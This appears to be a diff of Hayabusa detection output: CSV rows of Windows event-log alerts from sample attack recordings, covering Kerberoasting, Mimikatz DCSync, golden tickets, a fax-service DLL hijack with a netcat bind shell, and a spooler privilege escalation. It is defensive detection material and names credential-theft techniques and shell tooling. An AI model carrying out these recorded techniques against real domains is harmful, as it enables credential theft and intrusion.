+2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User:  | Svc:  | IP Addr: ::ffff:10.23.23.9 | Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: Svc-SQL-DB01 | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,CredAccess,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:37.200 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:37.212 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: FS02$ | Computer: - | IP Addr: 10.23.42.18 | LID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Persis | Evas,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx
+2020-08-03 01:24:07.559 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\pipey | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 864 | Tgt PGUID: 747F3D96-E309-5F26-0000-001021BC0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 820 | Tgt PGUID: 747F3D96-E309-5F26-0000-0010137B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Users\IEUser\Tools\Misc\nc.exe | PID: 7836 | PGUID: 747F3D96-E8B8-5F26-0000-00100AA71A00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\FXSSVC.exe | PID: 5252 | PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x3e7 | PID: 8104 | PGUID: 747F3D96-E8BA-5F26-0000-001035BE1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 588 | PGUID: 747F3D96-E8BC-5F26-0000-0010F7C41A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-12 22:04:27.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\Temp\__SKIP_1E14 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.454 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\{A6F2FD48-5F14-4B5F-ACC3-8DE2ACD8E384} | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRVUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.INI | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
